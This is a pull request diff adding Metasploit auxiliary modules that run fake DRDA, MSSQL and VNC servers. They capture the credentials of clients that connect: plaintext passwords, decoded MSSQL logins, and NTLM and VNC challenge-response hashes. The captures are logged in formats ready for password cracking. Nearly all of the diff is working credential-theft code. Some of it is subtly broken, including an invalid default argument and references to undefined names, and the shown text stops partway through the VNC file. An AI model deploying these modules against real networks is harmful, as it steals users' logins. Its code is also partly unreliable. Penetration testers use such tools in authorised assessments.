### PR TITLE
Add vnc, mssql and drda login capturing modules

### DIFF
--- a/modules/auxiliary/server/capture/drda.rb
+++ b/modules/auxiliary/server/capture/drda.rb
@@ -1,0 +1,249 @@
+##
+# $Id: drda.rb 14774 2012-02-21 01:42:17Z rapid7 $
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+	include Msf::Exploit::Remote::TcpServer
+	include Msf::Auxiliary::Report
+
+	class Constants
+		CODEPOINT_ACCSEC    = 0x106d
+		CODEPOINT_SECCHK    = 0x106e
+		CODEPOINT_SRVCLSNM  = 0x1147
+		CODEPOINT_SRVCOD    = 0x1149
+		CODEPOINT_SRVRLSLV  = 0x115a
+		CODEPOINT_EXTNAM    = 0x115e
+		CODEPOINT_SRVNAM    = 0x116d
+		CODEPOINT_USERID    = 0x11a0
+		CODEPOINT_PASSWORD  = 0x11a1
+		CODEPOINT_SECMEC    = 0x11a2
+		CODEPOINT_SECCHKCD  = 0x11a4
+		CODEPOINT_SECCHKRM  = 0x1219
+		CODEPOINT_MGRLVLLS  = 0x1404
+		CODEPOINT_EXCSATRD  = 0x1443
+		CODEPOINT_ACCSECRD  = 0x14ac
+		CODEPOINT_RDBNAM    = 0x2110
+	end
+
+	def initialize
+		super(
+			'Name'           => 'Authentication Capture: DRDA (DB2, Informix, Derby)',
+			'Version'        => '$Revision: 14774 $',
+			'Description'    => %q{
+				This module provides a fake DRDA (DB2, Informix, Derby) server
+			that is designed to capture authentication credentials.
+			},
+			'Author'         => 'Patrik Karlsson <patrik[at]cqure.net>',
+			'License'        => MSF_LICENSE,
+			'Actions'        => [ [ 'Capture' ] ],
+			'PassiveActions' => [ 'Capture' ],
+			'DefaultAction'  => 'Capture'
+		)
+
+		register_options(
+			[
+				OptPort.new('SRVPORT', [ true, "The local port to listen on.", 50000 ])
+			], self.class)
+	end
+
+	def setup
+		super
+		@state = {}
+	end
+
+	def run
+		exploit()
+	end
+
+	def on_client_connect(c)
+		@state[c] = {
+			:name     => "#{c.peerhost}:#{c.peerport}",
+			:ip       => c.peerhost,
+			:port     => c.peerport,
+			:user     => nil,
+			:pass     => nil,
+			:database => nil
+		}
+	end
+
+	# translates EBDIC to ASCII
+	def drda_ebdic_to_ascii(str)
+		e2a = [
+			"000102039C09867F978D8E0B0C0D0E0F101112139D8508871819928F1C1D1E1F" +
+			"80818283840A171B88898A8B8C050607909116939495960498999A9B14159E1A" +
+			"20A0A1A2A3A4A5A6A7A8D52E3C282B7C26A9AAABACADAEAFB0B121242A293B5E" +
+			"2D2FB2B3B4B5B6B7B8B9E52C255F3E3FBABBBCBDBEBFC0C1C2603A2340273D22" +
+			"C3616263646566676869C4C5C6C7C8C9CA6A6B6C6D6E6F707172CBCCCDCECFD0" +
+			"D17E737475767778797AD2D3D45BD6D7D8D9DADBDCDDDEDFE0E1E2E3E45DE6E7" +
+			"7B414243444546474849E8E9EAEBECED7D4A4B4C4D4E4F505152EEEFF0F1F2F3" +
+			"5C9F535455565758595AF4F5F6F7F8F930313233343536373839FAFBFCFDFEFF"
+		].pack("H*")
+		str.unpack('C*').map {|c| e2a[c,1][0] }.pack('C*')
+	end
+
+	# translates ASCII to EBDIC
+	def drda_ascii_to_ebdic(str)
+		a2e = [
+			"00010203372D2E2F1605250B0C0D0E0F101112133C3D322618193F271C1D1E1F" +
+			"405A7F7B5B6C507D4D5D5C4E6B604B61F0F1F2F3F4F5F6F7F8F97A5E4C7E6E6F" +
+			"7CC1C2C3C4C5C6C7C8C9D1D2D3D4D5D6D7D8D9E2E3E4E5E6E7E8E9ADE0BD5F6D" +
+			"79818283848586878889919293949596979899A2A3A4A5A6A7A8A9C04FD0A107" +
+			"202122232415061728292A2B2C090A1B30311A333435360838393A3B04143EE1" +
+			"4142434445464748495152535455565758596263646566676869707172737475" +
+			"767778808A8B8C8D8E8F909A9B9C9D9E9FA0AAABAC4AAEAFB0B1B2B3B4B5B6B7" +
+			"B8B9BABBBC6ABEBFCACBCCCDCECFDADBDCDDDEDFEAEBECEDEEEFFAFBFCFDFEFF"
+		].pack("H*")
+		str.unpack('C*').map {|c| a2e[c,1][0] }.pack('C*')
+	end
+
+	# parses and returns a DRDA parameter
+	def drda_parse_parameter(data)
+		param = {
+			:length => data.slice!(0,2).unpack("n")[0],
+			:codepoint => data.slice!(0,2).unpack("n")[0],
+			:data => ""
+		}
+		param[:data] = drda_ebdic_to_ascii(data.slice!(0,param[:length] - 4).unpack("A*")[0])
+		param
+	end
+
+	# creates a DRDA parameter
+	def drda_create_parameter(codepoint, data)
+		param = {
+			:codepoint => codepoint,
+			:data => drda_ascii_to_ebdic(data),
+			:length => data.length + 4
+		}
+		param
+	end
+
+	# creates a DRDA CMD with parameters and returns it as an opaque string
+	def drda_create_cmd(codepoint, options = { format = 0x43, correlid = 0x01 }, params=[])
+		data = ""
+		for p in params.each
+			data << [p[:length]].pack("n")
+			data << [p[:codepoint]].pack("n")
+			data << [p[:data]].pack("A*")
+		end
+
+		hdr = ""
+		hdr << [data.length + 10].pack("n")
+		hdr << [0xd0].pack("C") # magic
+		hdr << [options[:format]].pack("C") # format
+		hdr << [options[:correlid]].pack("n") # corellid
+		hdr << [data.length + 4].pack("n") # length2
+		hdr << [codepoint].pack("n")
+
+		data = hdr + data
+		data
+	end
+
+	# parses a response and returns an array with commands and parameters
+	def drda_parse_response(data)
+		result = []
+
+		until data.empty?
+			cp = {
+				:length => data.slice!(0, 2).unpack("n")[0],
+				:magic  => data.slice!(0, 1).unpack("C")[0],
+				:format => data.slice!(0, 1).unpack("C")[0],
+				:corellid => data.slice!(0,2).unpack("n")[0],
+				:length2 => data.slice!(0,2).unpack("n")[0],
+				:codepoint => data.slice!(0,2).unpack("n")[0],
+				:params => []
+			}
+			cpdata = data.slice!(0, cp[:length] - 10)
+			until cpdata.empty?
+				cp[:params] << drda_parse_parameter(cpdata)
+			end
+			result << cp
+		end
+		result
+	end
+
+	# sends of a DRDA command
+	def drda_send_cmd(c, cmd)
+		data = ""
+		cmd.each {|d| data << d}
+		c.put data
+	end
+
+	def on_client_data(c)
+		data = c.get_once
+
+		return if not data
+
+		for cmd in drda_parse_response(data).each
+			case cmd[:codepoint]
+			when Constants::CODEPOINT_ACCSEC
+				params = []
+				params << drda_create_parameter(Constants::CODEPOINT_EXTNAM, "DB2     db2sysc 05D80B00%FED%Y00")
+				params << drda_create_parameter(Constants::CODEPOINT_MGRLVLLS, ["9d03008e847f008e1c970000840f00979d20008d9dbe0097"].pack("H*"))
+				params << drda_create_parameter(Constants::CODEPOINT_SRVCLSNM, "QDB2/NT64")
+				params << drda_create_parameter(Constants::CODEPOINT_SRVNAM, "DB2")
+				params << drda_create_parameter(Constants::CODEPOINT_SRVRLSLV, "SQL10010")
+
+				cmd = []
+				cmd << drda_create_cmd(Constants::CODEPOINT_EXCSATRD, { :format => 0x43, :correlid => 1 }, params)
+
+				params = []
+				params << drda_create_parameter(Constants::CODEPOINT_SECMEC, "\x00\x03")
+				cmd << drda_create_cmd(Constants::CODEPOINT_ACCSECRD, { :format => 3, :correlid => 2 }, params)
+
+				drda_send_cmd(c, cmd)
+
+			when Constants::CODEPOINT_SECCHK
+				for p in cmd[:params].each
+					case p[:codepoint]
+					when Constants::CODEPOINT_USERID
+						@state[c][:user] = p[:data].rstrip
+					when Constants::CODEPOINT_PASSWORD
+						@state[c][:pass] = p[:data].rstrip
+					when Constants::CODEPOINT_RDBNAM
+						@state[c][:database] = p[:data].rstrip
+					end
+				end
+			else
+				# print_status("unhandled codepoint: #{cmd[:codepoint]}")
+				# do nothing
+			end
+		end
+
+		if @state[c][:user] and @state[c][:pass]
+			print_status("DRDA LOGIN Database: #{@state[c][:database]}; #{@state[c][:user]} / #{@state[c][:pass]}")
+			report_auth_info(
+			:host      => @state[c][:ip],
+			:port      => datastore['SRVPORT'],
+			:sname     => 'drda',
+			:user      => @state[c][:user],
+			:pass      => @state[c][:pass],
+			:source_type => "captured",
+			:active    => true
+			)
+
+			params = []
+			params << drda_create_parameter(Constants::CODEPOINT_SRVCOD, "\x00\x97")
+			params << drda_create_parameter(Constants::CODEPOINT_SECCHKCD, "\x0f")
+
+			cmd = []
+			cmd << drda_create_cmd(Constants::CODEPOINT_SECCHKRM, { :format => 2, :correlid => 1 }, params)
+
+			drda_send_cmd(c, cmd)
+			#c.close
+		end
+	end
+
+	def on_client_close(c)
+		@state.delete(c)
+	end
+end

--- a/modules/auxiliary/server/capture/mssql.rb
+++ b/modules/auxiliary/server/capture/mssql.rb
@@ -1,0 +1,538 @@
+##
+# $Id: mssql.rb 14774 2012-02-21 01:42:17Z rapid7 $
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'rex/proto/ntlm/constants'
+require 'rex/proto/ntlm/message'
+require 'rex/proto/ntlm/crypt'
+
+NTLM_CONST = Rex::Proto::NTLM::Constants
+NTLM_CRYPT = Rex::Proto::NTLM::Crypt
+MESSAGE = Rex::Proto::NTLM::Message
+
+class Metasploit3 < Msf::Auxiliary
+
+	include Msf::Exploit::Remote::TcpServer
+	include Msf::Exploit::Remote::SMBServer
+	include Msf::Auxiliary::Report
+
+	class Constants
+		TDS_MSG_RESPONSE  = 0x04
+		TDS_MSG_LOGIN     = 0x10
+		TDS_MSG_SSPI      = 0x11
+		TDS_MSG_PRELOGIN  = 0x12
+
+		TDS_TOKEN_ERROR   = 0xAA
+		TDS_TOKEN_AUTH    = 0xED
+	end
+
+	def initialize
+		super(
+			'Name'           => 'Authentication Capture: MSSQL',
+			'Version'        => '$Revision: 14774 $',
+			'Description'    => %q{
+				This module provides a fake MSSQL service that
+			is designed to capture authentication credentials. The modules
+			supports both the weak encoded database logins as well as Windows
+			logins (NTLM).
+			},
+			'Author'         => 'Patrik Karlsson <patrik[at]cqure.net>',
+			'License'        => MSF_LICENSE,
+			'Actions'        => [ [ 'Capture' ] ],
+			'PassiveActions' => [ 'Capture' ],
+			'DefaultAction'  => 'Capture'
+		)
+
+		register_options(
+			[
+				OptPort.new('SRVPORT', [ true, "The local port to listen on.", 1433 ]),
+				OptString.new('CAINPWFILE',  [ false, "The local filename to store the hashes in Cain&Abel format", nil ]),
+				OptString.new('JOHNPWFILE',  [ false, "The prefix to the local filename to store the hashes in JOHN format", nil ]),
+				OptString.new('CHALLENGE',   [ true, "The 8 byte challenge ", "1122334455667788" ])
+			], self.class)
+	end
+
+	def setup
+		super
+		@state = {}
+	end
+
+	def run
+		if datastore['CHALLENGE'].to_s =~ /^([a-fA-F0-9]{16})$/
+			@challenge = [ datastore['CHALLENGE'] ].pack("H*")
+		else
+			print_error("CHALLENGE syntax must match 1122334455667788")
+			return
+		end
+
+		#those variables will prevent to spam the screen with identical hashes (works only with ntlmv1)
+		@previous_lm_hash="none"
+		@previous_ntlm_hash="none"
+
+		exploit()
+	end
+
+	def on_client_connect(c)
+		@state[c] = {
+			:name    => "#{c.peerhost}:#{c.peerport}",
+			:ip      => c.peerhost,
+			:port    => c.peerport,
+			:user    => nil,
+			:pass    => nil
+		}
+	end
+
+	# decodes a mssql password
+	def mssql_tds_decrypt(pass)
+		Rex::Text.to_ascii(pass.unpack("C*").map {|c| ((( c ^ 0xa5 ) & 0x0F) << 4) | ((( c ^ 0xa5 ) & 0xF0 ) >> 4) }.pack("C*"))
+	end
+
+	# doesn't do any real parsing, slices of the data
+	def mssql_parse_prelogin(data, info)
+		status = data.slice!(0,1).unpack('C')[0]
+		len = data.slice!(0,2).unpack('n')[0]
+
+		# just slice away the rest of the packet
+		data.slice!(0, len - 4)
+		return []
+	end
+
+	# parses a login packet sent to the server
+	def mssql_parse_login(data, info)
+		status = data.slice!(0,1).unpack('C')[0]
+		len = data.slice!(0,2).unpack('n')[0]
+
+		if len > data.length + 4
+			info[:errors] << "Login packet to short"
+			return
+		end
+
+		# slice of:
+		#   * channel, packetno, window
+		#   * login header
+		#   * client name lengt & offset
+		login_hdr = data.slice!(0,4 + 36 + 4)
+
+		username_offset = data.slice!(0,2).unpack('v')[0]
+		username_length = data.slice!(0,2).unpack('v')[0]
+
+		pw_offset = data.slice!(0,2).unpack('v')[0]
+		pw_length = data.slice!(0,2).unpack('v')[0]
+
+		appname_offset = data.slice!(0,2).unpack('v')[0]
+		appname_length = data.slice!(0,2).unpack('v')[0]
+
+		srvname_offset = data.slice!(0,2).unpack('v')[0]
+		srvname_length = data.slice!(0,2).unpack('v')[0]
+
+		if username_offset > 0 and pw_offset > 0
+			offset = username_offset - 56
+			info[:user] = Rex::Text::to_ascii(data[offset..(offset + username_length * 2)])
+
+			offset = pw_offset - 56
+			if pw_length == 0
+				info[:pass] = "<empty>"
+			else
+				info[:pass] = mssql_tds_decrypt(data[offset..(offset + pw_length * 2)].unpack("A*")[0])
+			end
+
+			offset = srvname_offset - 56
+			info[:srvname] = Rex::Text::to_ascii(data[offset..(offset + srvname_length * 2)])
+		else
+			info[:isntlm?]= true
+		end
+
+		# slice of remaining packet
+		data.slice!(0, data.length)
+
+		info
+	end
+
+	# copied and slightly modified from http_ntlm html_get_hash
+	def mssql_get_hash(arg = {})
+		ntlm_ver = arg[:ntlm_ver]
+		if ntlm_ver == NTLM_CONST::NTLM_V1_RESPONSE or ntlm_ver == NTLM_CONST::NTLM_2_SESSION_RESPONSE
+			lm_hash = arg[:lm_hash]
+			nt_hash = arg[:nt_hash]
+		else
+			lm_hash = arg[:lm_hash]
+			nt_hash = arg[:nt_hash]
+			lm_cli_challenge = arg[:lm_cli_challenge]
+			nt_cli_challenge = arg[:nt_cli_challenge]
+		end
+		domain = arg[:domain]
+		user = arg[:user]
+		host = arg[:host]
+		ip = arg[:ip]
+
+		unless @previous_lm_hash == lm_hash and @previous_ntlm_hash == nt_hash then
+			@previous_lm_hash = lm_hash
+			@previous_ntlm_hash = nt_hash
+			# Check if we have default values (empty pwd, null hashes, ...) and adjust the on-screen messages correctly
+			case ntlm_ver
+			when NTLM_CONST::NTLM_V1_RESPONSE
+				if NTLM_CRYPT::is_hash_from_empty_pwd?({:hash => [nt_hash].pack("H*"),:srv_challenge => @challenge,
+					:ntlm_ver => NTLM_CONST::NTLM_V1_RESPONSE, :type => 'ntlm' })
+					print_status("NLMv1 Hash correspond to an empty password, ignoring ... ")
+					return
+				end
+				if (lm_hash == nt_hash or lm_hash == "" or lm_hash =~ /^0*$/ ) then
+					lm_hash_message = "Disabled"
+				elsif NTLM_CRYPT::is_hash_from_empty_pwd?({:hash => [lm_hash].pack("H*"),:srv_challenge => @challenge,
+					:ntlm_ver => NTLM_CONST::NTLM_V1_RESPONSE, :type => 'lm' })
+					lm_hash_message = "Disabled (from empty password)"
+				else
+					lm_hash_message = lm_hash
+					lm_chall_message = lm_cli_challenge
+				end
+			when NTLM_CONST::NTLM_V2_RESPONSE
+				if NTLM_CRYPT::is_hash_from_empty_pwd?({:hash => [nt_hash].pack("H*"),:srv_challenge => @challenge,
+					:cli_challenge => [nt_cli_challenge].pack("H*"),
+					:user => Rex::Text::to_ascii(user),
+					:domain => Rex::Text::to_ascii(domain),
+					:ntlm_ver => NTLM_CONST::NTLM_V2_RESPONSE, :type => 'ntlm' })
+					print_status("NTLMv2 Hash correspond to an empty password, ignoring ... ")
+					return
+				end
+				if lm_hash == '0' * 32 and lm_cli_challenge == '0' * 16
+					lm_hash_message = "Disabled"
+					lm_chall_message = 'Disabled'
+				elsif NTLM_CRYPT::is_hash_from_empty_pwd?({:hash => [lm_hash].pack("H*"),:srv_challenge => @challenge,
+					:cli_challenge => [lm_cli_challenge].pack("H*"),
+					:user => Rex::Text::to_ascii(user),
+					:domain => Rex::Text::to_ascii(domain),
+					:ntlm_ver => NTLM_CONST::NTLM_V2_RESPONSE, :type => 'lm' })
+					lm_hash_message = "Disabled (from empty password)"
+					lm_chall_message = 'Disabled'
+				else
+					lm_hash_message = lm_hash
+					lm_chall_message = lm_cli_challenge
+				end
+			when NTLM_CONST::NTLM_2_SESSION_RESPONSE
+				if NTLM_CRYPT::is_hash_from_empty_pwd?({:hash => [nt_hash].pack("H*"),:srv_challenge => @challenge,
+					:cli_challenge => [lm_hash].pack("H*")[0,8],
+					:ntlm_ver => NTLM_CONST::NTLM_2_SESSION_RESPONSE, :type => 'ntlm' })
+					print_status("NTLM2_session Hash correspond to an empty password, ignoring ... ")
+					return
+				end
+				lm_hash_message = lm_hash
+				lm_chall_message = lm_cli_challenge
+			end
+
+			# Display messages
+			domain = Rex::Text::to_ascii(domain)
+			user = Rex::Text::to_ascii(user)
+
+			capturedtime = Time.now.to_s
+			case ntlm_ver
+			when NTLM_CONST::NTLM_V1_RESPONSE
+				smb_db_type_hash = "smb_netv1_hash"
+				capturelogmessage =
+				"#{capturedtime}\nNTLMv1 Response Captured from #{host} \n" +
+				"DOMAIN: #{domain} USER: #{user} \n" +
+				"LMHASH:#{lm_hash_message ? lm_hash_message : "<NULL>"} \nNTHASH:#{nt_hash ? nt_hash : "<NULL>"}\n"
+			when NTLM_CONST::NTLM_V2_RESPONSE
+				smb_db_type_hash = "smb_netv2_hash"
+				capturelogmessage =
+				"#{capturedtime}\nNTLMv2 Response Captured from #{host} \n" +
+				"DOMAIN: #{domain} USER: #{user} \n" +
+				"LMHASH:#{lm_hash_message ? lm_hash_message : "<NULL>"} " +
+				"LM_CLIENT_CHALLENGE:#{lm_chall_message ? lm_chall_message : "<NULL>"}\n" +
+				"NTHASH:#{nt_hash ? nt_hash : "<NULL>"} " +
+				"NT_CLIENT_CHALLENGE:#{nt_cli_challenge ? nt_cli_challenge : "<NULL>"}\n"
+			when NTLM_CONST::NTLM_2_SESSION_RESPONSE
+				#we can consider those as netv1 has they have the same size and i cracked the same way by cain/jtr
+				#also 'real' netv1 is almost never seen nowadays except with smbmount or msf server capture
+				smb_db_type_hash = "smb_netv1_hash"
+				capturelogmessage =
+				"#{capturedtime}\nNTLM2_SESSION Response Captured from #{host} \n" +
+				"DOMAIN: #{domain} USER: #{user} \n" +
+				"NTHASH:#{nt_hash ? nt_hash : "<NULL>"}\n" +
+				"NT_CLIENT_CHALLENGE:#{lm_hash_message ? lm_hash_message[0,16] : "<NULL>"} \n"
+
+			else # should not happen
+				return
+			end
+
+			print_status(capturelogmessage)
+
+			# DB reporting
+			# Rem :  one report it as a smb_challenge on port 445 has breaking those hashes
+			# will be mainly use for psexec / smb related exploit
+			report_auth_info(
+				:host  => arg[:ip],
+				:port => 445,
+				:sname => 'smb_challenge',
+				:user => user,
+				:pass => domain + ":" +
+				( lm_hash + lm_cli_challenge.to_s ? lm_hash + lm_cli_challenge.to_s : "00" * 24 ) + ":" +
+				( nt_hash + nt_cli_challenge.to_s ? nt_hash + nt_cli_challenge.to_s :  "00" * 24 ) + ":" +
+				datastore['CHALLENGE'].to_s,
+				:type => smb_db_type_hash,
+				:proof => "DOMAIN=#{domain}",
+				:source_type => "captured",
+				:active => true
+			)
+			#if(datastore['LOGFILE'])
+			#	File.open(datastore['LOGFILE'], "ab") {|fd| fd.puts(capturelogmessage + "\n")}
+			#end
+
+			if(datastore['CAINPWFILE'] and user)
+				if ntlm_ver == NTLM_CONST::NTLM_V1_RESPONSE or ntlm_ver == NTLM_CONST::NTLM_2_SESSION_RESPONSE
+					fd = File.open(datastore['CAINPWFILE'], "ab")
+					fd.puts(
+					[
+						user,
+						domain ? domain : "NULL",
+						@challenge.unpack("H*")[0],
+						lm_hash ? lm_hash : "0" * 48,
+						nt_hash ? nt_hash : "0" * 48
+						].join(":").gsub(/\n/, "\\n")
+						)
+						fd.close
+				end
+			end
+
+			if(datastore['JOHNPWFILE'] and user)
+				case ntlm_ver
+				when NTLM_CONST::NTLM_V1_RESPONSE, NTLM_CONST::NTLM_2_SESSION_RESPONSE
+					fd = File.open(datastore['JOHNPWFILE'] + '_netntlm', "ab")
+					fd.puts(
+					[
+						user,"",
+						domain ? domain : "NULL",
+						lm_hash ? lm_hash : "0" * 48,
+						nt_hash ? nt_hash : "0" * 48,
+						@challenge.unpack("H*")[0]
+						].join(":").gsub(/\n/, "\\n")
+						)
+						fd.close
+				when NTLM_CONST::NTLM_V2_RESPONSE
+					#lmv2
+					fd = File.open(datastore['JOHNPWFILE'] + '_netlmv2', "ab")
+					fd.puts(
+						[
+							user,"",
+							domain ? domain : "NULL",
+							@challenge.unpack("H*")[0],
+							lm_hash ? lm_hash : "0" * 32,
+							lm_cli_challenge ? lm_cli_challenge : "0" * 16
+						].join(":").gsub(/\n/, "\\n")
+					)
+					fd.close
+					#ntlmv2
+					fd = File.open(datastore['JOHNPWFILE'] + '_netntlmv2' , "ab")
+					fd.puts(
+						[
+							user,"",
+							domain ? domain : "NULL",
+							@challenge.unpack("H*")[0],
+							nt_hash ? nt_hash : "0" * 32,
+							nt_cli_challenge ? nt_cli_challenge : "0" * 160
+							].join(":").gsub(/\n/, "\\n")
+					)
+					fd.close
+				end
+			end
+		end
+	end
+
+	def mssql_parse_ntlmsspi(data, info)
+		start = data.index('NTLMSSP')
+		if start
+			data.slice!(0,start)
+		else
+			print_error("Failed to find NTLMSSP authentication blob")
+			return
+		end
+
+		ntlm_message = NTLM_MESSAGE::parse(data)
+		case ntlm_message
+		when NTLM_MESSAGE::Type3
+			lm_len = ntlm_message.lm_response.length # Always 24
+			nt_len = ntlm_message.ntlm_response.length
+
+			if nt_len == 24 #lmv1/ntlmv1 or ntlm2_session
+				arg = {	:ntlm_ver => NTLM_CONST::NTLM_V1_RESPONSE,
+					:lm_hash => ntlm_message.lm_response.unpack('H*')[0],
+					:nt_hash => ntlm_message.ntlm_response.unpack('H*')[0]
+				}
+
+				if @s_ntlm_esn && arg[:lm_hash][16,32] == '0' * 32
+					arg[:ntlm_ver] = NTLM_CONST::NTLM_2_SESSION_RESPONSE
+				end
+				#if the length of the ntlm response is not 24 then it will be bigger and represent
+				# a ntlmv2 response
+			elsif nt_len > 24 #lmv2/ntlmv2
+				arg = {	:ntlm_ver 		=> NTLM_CONST::NTLM_V2_RESPONSE,
+					:lm_hash 		=> ntlm_message.lm_response[0, 16].unpack('H*')[0],
+					:lm_cli_challenge 	=> ntlm_message.lm_response[16, 8].unpack('H*')[0],
+					:nt_hash 		=> ntlm_message.ntlm_response[0, 16].unpack('H*')[0],
+					:nt_cli_challenge 	=> ntlm_message.ntlm_response[16, nt_len - 16].unpack('H*')[0]
+				}
+			elsif nt_len == 0
+				print_status("Empty hash from #{smb[:name]} captured, ignoring ... ")
+				return
+			else
+				print_status("Unknown hash type from #{smb[:name]}, ignoring ...")
+				return
+			end
+
+			arg[:user] = ntlm_message.user
+			arg[:domain]   = ntlm_message.domain
+			arg[:ip] = info[:ip]
+			arg[:host] = info[:ip]
+
+			begin
+				mssql_get_hash(arg)
+			rescue ::Exception => e
+				print_error("Error processing Hash from #{smb[:name]} : #{e.class} #{e} #{e.backtrace}")
+			end
+		else
+			info[:errors] << "Unsupported NTLM authentication message type"
+		end
+
+		# slice of remainder
+		data.slice!(0,data.length)
+	end
+
+	#
+	# Parse individual tokens from a TDS reply
+	#
+	def mssql_parse_reply(data, info)
+		info[:errors] = []
+		return if not data
+		until data.empty? or ( info[:errors] and not info[:errors].empty? )
+			token = data.slice!(0,1).unpack('C')[0]
+			case token
+			when Constants::TDS_MSG_LOGIN
+				mssql_parse_login(data, info)
+				info[:type] = Constants::TDS_MSG_LOGIN
+			when Constants::TDS_MSG_PRELOGIN
+				mssql_parse_prelogin(data, info)
+				info[:type] = Constants::TDS_MSG_PRELOGIN
+			when Constants::TDS_MSG_SSPI
+				mssql_parse_ntlmsspi(data, info)
+				info[:type] = Constants::TDS_MSG_SSPI
+			else
+				info[:errors] << "unsupported token: #{token}"
+			end
+		end
+		info
+	end
+
+	# Sends an error message to the MSSQL client
+	def mssql_send_error(c, msg)
+		data = [
+			Constants::TDS_MSG_RESPONSE,
+			1, # status
+			0x0020 + msg.length * 2,
+			0x0037, # channel: 55
+			0x01,   # packet no: 1
+			0x00,   # window: 0
+			Constants::TDS_TOKEN_ERROR,
+			0x000C + msg.length * 2,
+			18456,  # SQL Error number
+			1,      # state: 1
+			14,     # severity: 14
+			msg.length,   # error msg length
+			0,
+			Rex::Text::to_unicode(msg),
+			0, # server name length
+			0, # process name length
+			0, # line number
+			"fd0200000000000000"
+			].pack("CCnnCCCvVCCCCA*CCnH*")
+		c.put data
+	end
+
+	def mssql_send_ntlm_challenge(c, info)
+		data = [
+			Constants::TDS_MSG_RESPONSE,
+			1, # status
+			0x0043, # length
+			0x0000, # channel
+			0x01,   # packetno
+			0x00,   # window
+			Constants::TDS_TOKEN_AUTH,   # token: authentication
+			0x0038, # length
+			"NTLMSSP",
+			2, # NTLMSSP_CHALLENGE
+			"0000000038000000", # Target name: NULL
+			0x02008201, #flags
+			@challenge, # NTLM Challenge: 1122334455667788
+			"0000000000000000", # reserved
+			"0000000038000000", # Target Info List: Empty
+			"0502ce0e0000000f"  # Version: 5.2, Build: 3790, NTLM Revision: 15
+		].pack("CCnnCCCvZ*VH*VA*H*H*H*")
+		c.put data
+	end
+
+	def mssql_send_prelogin_response(c, info)
+		data = [
+			Constants::TDS_MSG_RESPONSE,
+			1, # status
+			0x002b, # length
+			"0000010000001a00060100200001020021000103002200000400220001ff0a3206510000020000"
+		].pack("CCnH*")
+		c.put data
+	end
+
+	def on_client_data(c)
+		info = {:errors => [], :ip => @state[c][:ip]}
+		data = c.get_once
+		return if not data
+
+		info = mssql_parse_reply(data, info)
+
+		if(info[:errors] and not info[:errors].empty?)
+			print_error("#{info[:errors]}")
+			c.close
+			return
+		end
+
+		# no errors, and the packet was a prelogin
+		# if we just close the connection here, it seems that the client:
+		# SQL Server Management Studio 2008R2, falls back to the weaker encoded
+		# password authentication.
+		case info[:type]
+		when Constants::TDS_MSG_PRELOGIN
+			mssql_send_prelogin_response(c, info)
+
+		when Constants::TDS_MSG_SSPI
+			mssql_send_error(c, "Error: Login failed. The login is from an untrusted domain and cannot be used with Windows authentication.")
+
+		when Constants::TDS_MSG_LOGIN
+			if info[:isntlm?] == true
+				mssql_send_ntlm_challenge(c, info)
+			elsif info[:user] and info[:pass]
+				report_auth_info(
+				:host      => @state[c][:ip],
+				:port      => datastore['SRVPORT'],
+				:sname     => 'mssql',
+				:user      => info[:user],
+				:pass      => info[:pass],
+				:source_type => "captured",
+				:active    => true
+				)
+
+				print_status("MSSQL LOGIN #{@state[c][:name]} #{info[:user]} / #{info[:pass]}")
+				mssql_send_error(c, "Login failed for user '#{info[:user]}'.")
+
+				c.close
+			end
+		end
+	end
+
+	def on_client_close(c)
+		@state.delete(c)
+	end
+end

--- a/modules/auxiliary/server/capture/vnc.rb
+++ b/modules/auxiliary/server/capture/vnc.rb
@@ -1,0 +1,105 @@
+##
+# $Id: vnc.rb 14774 2012-02-21 01:42:17Z rapid7 $
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+	include Msf::Exploit::Remote::TcpServer
+	include Msf::Auxiliary::Report
+
+	def initialize
+		super(
+			'Name'           => 'Authentication Capture: VNC',
+			'Version'        => '$Revision: 14774 $',
+			'Description'    => %q{
+				This module provides a fake VNC service that
+			is designed to capture authentication credentials.
+			},
+			'Author'         => 'Patrik Karlsson patrik[at]cqure.net',
+			'License'        => MSF_LICENSE,
+			'Actions'        => [ [ 'Capture' ] ],
+			'PassiveActions' => [ 'Capture' ],
+			'DefaultAction'  => 'Capture'
+		)
+
+		register_options(
+			[
+				OptPort.new('SRVPORT', [ true, "The local port to listen on.", 5900 ]),
+				OptString.new('CHALLENGE', [ true, "The 16 byte challenge", "00112233445566778899AABBCCDDEEFF" ]),
+				OptString.new('JOHNPWFILE',  [ false, "The prefix to the local filename to store the hashes in JOHN format", nil ])
+			], self.class)
+	end
+
+	def setup
+		super
+		@state = {}
+	end
+
+	def run
+		if datastore['CHALLENGE'].to_s =~ /^([a-fA-F0-9]{32})$/
+			@challenge = [ datastore['CHALLENGE'] ].pack("H*")
+		else
+			print_error("CHALLENGE syntax must match 1122334455667788")
+			return
+		end
+		exploit()
+	end
+
+	def on_client_connect(c)
+		@state[c] = {
+			:name    => "#{c.peerhost}:#{c.peerport}",
+			:ip      => c.peerhost,
+			:port    => c.peerport,
+			:pass    => nil,
+			:chall   => nil
+		}
+
+		c.put "RFB 003.007\n"
+	end
+
+	def on_client_data(c)
+		data = c.get_once
+		return if not data
+
+		if data.match("^RFB")
+			sectype = [0x00000002].pack("N")
+			@state[c][:chall] = ["00112233445566778899AABBCCDDEEFF"].pack("H*")
+			c.put sectype
+			c.put @state[c][:chall]
+		elsif @state[c][:chall]
+			c.put [0x00000001].pack("N")
+			c.close
+			print_status("VNC LOGIN: Challenge: #{@challenge.unpack('H*')}; Response: #{data.unpack('H*')}")
+			report_auth_info(
+				:host  => c.peerhost,
+				:port => datastore['SRVPORT'],
+				:sname => 'vnc_challenge',
+				:user => "",
+				:pass => "$vnc$*#{@state[c][:chall].unpack("H*")}*#{data.unpack('H*')}",
+				:type => "vnc_hash",
+				:proof => "$vnc$*#{@state[c][:chall].unpack("H*")}*#{data.unpack('H*')}",
+				:source_type => "captured",
+				:active => true
+			)
+
+			if(datastore['JOHNPWFILE'])
+				fd = File.open(datastore['JOHNPWFILE'] + '_vnc' , "ab")
